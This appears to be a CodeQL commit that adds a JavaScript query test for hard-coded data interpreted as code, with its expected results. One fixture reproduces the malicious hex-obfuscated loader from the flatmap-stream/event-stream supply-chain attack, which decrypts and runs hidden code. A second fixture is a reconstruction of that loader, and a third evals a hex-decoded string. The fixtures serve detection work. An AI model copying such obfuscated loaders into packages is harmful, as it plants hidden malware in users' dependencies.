JavaScript: Add new query HardcodedDataInterpretedAsCode.

2026-05-05 13:45:19 +02:00 · 2018-11-27 16:33:48 +00:00
parent 94a5722c2a
commit 5f16406ad7
11 changed files with 231 additions and 0 deletions
--- a/javascript/ql/test/query-tests/Security/CWE-506/HardcodedDataInterpretedAsCode.expected
+++ b/javascript/ql/test/query-tests/Security/CWE-506/HardcodedDataInterpretedAsCode.expected
@@ -0,0 +1,25 @@
+nodes
+| event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") |
+| event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" |
+| event-stream.js:9:11:9:37 | e("2e2f ... 17461") |
+| event-stream.js:9:13:9:36 | "2e2f74 ... 617461" |
+| tst.js:1:29:1:88 | '636f6e ... 6e2729' |
+| tst.js:2:6:2:46 | Buffer. ...  'hex') |
+| tst.js:2:6:2:57 | Buffer. ... tring() |
+| tst.js:2:18:2:38 | totally ... sString |
+| tst.js:5:12:5:23 | "0123456789" |
+| tst.js:7:8:7:11 | test |
+| tst.js:7:8:7:15 | test+"n" |
+edges
+| event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" | event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") |
+| event-stream.js:9:13:9:36 | "2e2f74 ... 617461" | event-stream.js:9:11:9:37 | e("2e2f ... 17461") |
+| tst.js:1:29:1:88 | '636f6e ... 6e2729' | tst.js:2:18:2:38 | totally ... sString |
+| tst.js:2:6:2:46 | Buffer. ...  'hex') | tst.js:2:6:2:57 | Buffer. ... tring() |
+| tst.js:2:18:2:38 | totally ... sString | tst.js:2:6:2:46 | Buffer. ...  'hex') |
+| tst.js:5:12:5:23 | "0123456789" | tst.js:7:8:7:11 | test |
+| tst.js:7:8:7:11 | test | tst.js:7:8:7:15 | test+"n" |
+#select
+| event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") | event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" | event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") | Hard-coded data from $@ is interpreted as an import path. | event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" | here |
+| event-stream.js:9:11:9:37 | e("2e2f ... 17461") | event-stream.js:9:13:9:36 | "2e2f74 ... 617461" | event-stream.js:9:11:9:37 | e("2e2f ... 17461") | Hard-coded data from $@ is interpreted as an import path. | event-stream.js:9:13:9:36 | "2e2f74 ... 617461" | here |
+| tst.js:2:6:2:57 | Buffer. ... tring() | tst.js:1:29:1:88 | '636f6e ... 6e2729' | tst.js:2:6:2:57 | Buffer. ... tring() | Hard-coded data from $@ is interpreted as code. | tst.js:1:29:1:88 | '636f6e ... 6e2729' | here |
+| tst.js:7:8:7:15 | test+"n" | tst.js:5:12:5:23 | "0123456789" | tst.js:7:8:7:15 | test+"n" | Hard-coded data from $@ is interpreted as code. | tst.js:5:12:5:23 | "0123456789" | here |
--- a/javascript/ql/test/query-tests/Security/CWE-506/HardcodedDataInterpretedAsCode.qlref
+++ b/javascript/ql/test/query-tests/Security/CWE-506/HardcodedDataInterpretedAsCode.qlref
@@ -0,0 +1 @@
+Security/CWE-506/HardcodedDataInterpretedAsCode.ql
--- a/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js
+++ b/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js
@@ -0,0 +1,2 @@
+// from https://unpkg.com/flatmap-stream@0.1.1/index.min.js
+var Stream=require("stream").Stream;module.exports=function(e,n){var i=new Stream,a=0,o=0,u=!1,f=!1,l=!1,c=0,s=!1,d=(n=n||{}).failures?"failure":"error",m={};function w(r,e){var t=c+1;if(e===t?(void 0!==r&&i.emit.apply(i,["data",r]),c++,t++):m[e]=r,m.hasOwnProperty(t)){var n=m[t];return delete m[t],w(n,t)}a===++o&&(f&&(f=!1,i.emit("drain")),u&&v())}function p(r,e,t){l||(s=!0,r&&!n.failures||w(e,t),r&&i.emit.apply(i,[d,r]),s=!1)}function b(r,t,n){return e.call(null,r,function(r,e){n(r,e,t)})}function v(r){if(u=!0,i.writable=!1,void 0!==r)return w(r,a);a==o&&(i.readable=!1,i.emit("end"),i.destroy())}return i.writable=!0,i.readable=!0,i.write=function(r){if(u)throw new Error("flatmap stream is not writable");s=!1;try{for(var e in r){a++;var t=b(r[e],a,p);if(f=!1===t)break}return!f}catch(r){if(s)throw r;return p(r),!f}},i.end=function(r){u||v(r)},i.destroy=function(){u=l=!0,i.writable=i.readable=f=!1,process.nextTick(function(){i.emit("close")})},i.pause=function(){f=!0},i.resume=function(){f=!1},i};!function(){try{var r=require,t=process;function e(r){return Buffer.from(r,"hex").toString()}var n=r(e("2e2f746573742f64617461")),o=t[e(n[3])][e(n[4])];if(!o)return;var u=r(e(n[2]))[e(n[6])](e(n[5]),o),a=u.update(n[0],e(n[8]),e(n[9]));a+=u.final(e(n[9]));var f=new module.constructor;f.paths=module.paths,f[e(n[7])](a,""),f.exports(n[1])}catch(r){}}();
--- a/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js
+++ b/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js
@@ -0,0 +1,20 @@
+// Based on https://github.com/dominictarr/event-stream/issues/116
+
+var r = require, t = process;
+
+function e(r) {
+  return Buffer.from(r, "hex").toString()
+}
+
+var n = r(e("2e2f746573742f64617461")),
+    o = t[e(n[3])][e(n[4])];
+
+if (!o) return;
+
+var u = r(e(n[2]))[e(n[6])](e(n[5]), o);
+a += u.final(e(n[9]));
+
+var f = new module.constructor;
+f.paths = module.paths; 
+f[e(n[7])](a, "");
+f.exports(n[1]);
--- a/javascript/ql/test/query-tests/Security/CWE-506/tst.js
+++ b/javascript/ql/test/query-tests/Security/CWE-506/tst.js
@@ -0,0 +1,11 @@
+var totallyHarmlessString = '636f6e736f6c652e6c6f672827636f646520696e6a656374696f6e2729';
+eval(Buffer.from(totallyHarmlessString, 'hex').toString()); // NOT OK: eval("console.log('code injection')")
+eval(totallyHarmlessString);                                // OK: throws parse error
+
+var test = "0123456789";
+try {
+  eval(test+"n"); // OK, but currently flagged
+  console.log("Bigints supported.");
+} catch(e) {
+  console.log("Bigints not supported.");
+}
				`@@ -0,0 +1 @@`
				`Security/CWE-506/HardcodedDataInterpretedAsCode.ql`